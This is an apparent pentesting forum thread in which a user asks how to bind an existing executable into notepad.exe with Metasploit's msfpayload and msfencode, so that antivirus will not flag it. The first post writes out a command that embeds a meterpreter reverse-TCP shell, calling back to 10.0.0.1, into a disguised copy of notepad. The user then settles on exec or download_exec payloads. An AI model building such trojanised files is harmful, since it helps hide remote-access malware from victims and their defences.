Results 1 to 6 of 6

Thread: Metasploit msfpayload | using an existing executable?

  1. #1
    Just burned his ISO dragon6's Avatar
    Join Date
    Apr 2010
    Posts
    5

    Default Metasploit msfpayload | using an existing executable?

    Hello,

    I'm trying to bind two executables with msfpayload and the msfencode features. However, I'm not sure that msfpayload will accept a preexisting executable instead of an input like 'windows/meterpreter/reverse_tcp'.

    This is what I would normally use:
    ./msfpayload windows/meterpreter/reverse_tcp LHOST=10.0.0.1 LPORT=8080 R | ./msfencode -t exe -x notepad.exe -o notepad32.exe

    This is what I'm trying to do:
    ./msfpayload MYFILE.exe X | ./msfencode -t exe -x notepad.exe -o notepad32.exe

    Does msfpayload allow this type of executable input? If so, what am I doing wrong?

  2. #2
    Member
    Join Date
    Jan 2010
    Posts
    332

    Default Re: Metasploit msfpayload | using an existing executable?

    No. It does not. As expected it handles payloads/shellcode. I am not even sure what would you try to accomplish with this?
    SecurityTube has two new sections. Questions & News

  3. #3
    Just burned his ISO dragon6's Avatar
    Join Date
    Apr 2010
    Posts
    5

    Unhappy Re: Metasploit msfpayload | using an existing executable?

    That's too bad..

    It would be a quick fix for what I need. I'm basically trying to bind two executables together while retaining the icon and 'Version' info of the original executable. I figured AVs would not scream bloody murder if I used something other than the widely available exe binders without having to purchase unique stubs...

  4. #4
    Just burned his ISO
    Join Date
    Mar 2009
    Posts
    17

    Default Re: Metasploit msfpayload | using an existing executable?

    Google is your friend.

    "metasploit using existing executables" returns

    Metasploit Framework - Support #1244: msfencode an exploit into an existing exe - Metasploit Redmine Interface

    Which when read states exactly what the combo is used for.

  5. #5
    Super Moderator lupin's Avatar
    Join Date
    Jan 2010
    Posts
    2,943

    Default Re: Metasploit msfpayload | using an existing executable?

    More here and here.
    Capitalisation is important. It's the difference between "Helping your brother Jack off a horse" and "Helping your brother jack off a horse".

    The Forum Rules, Forum FAQ and the BackTrack Wiki... learn them, love them, live them.

  6. #6
    Just burned his ISO dragon6's Avatar
    Join Date
    Apr 2010
    Posts
    5

    Default Re: Metasploit msfpayload | using an existing executable?

    Thanks for the info, those links increased the size of my brain.

    Since my original idea is not feasible, I've opted to go with the windows/exec payload(or maybe download_exec). I wasn't aware of the -k option. That effectively allows me to change strategy. My situation seems to be resolved...

    Many thanks for the help!

Similar Threads

  1. Replies: 5
    Last Post: 01-13-2010, 07:06 AM
  2. meterpreter + autoIT executable
    By lefty in forum OLD Pentesting
    Replies: 1
    Last Post: 12-25-2009, 11:39 AM
  3. Building a meterpreter executable (Metasploit)
    By stove937 in forum OLD Newbie Area
    Replies: 6
    Last Post: 12-05-2009, 01:56 PM
  4. msfpayload
    By imported_the_fulton in forum OLD BackTrack 4 Bugs and Fixes
    Replies: 4
    Last Post: 07-02-2009, 05:16 AM
  5. Simple [Executable] Bash Scripting
    By Munkey106 in forum OLD Newbie Area
    Replies: 6
    Last Post: 09-06-2008, 07:02 PM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •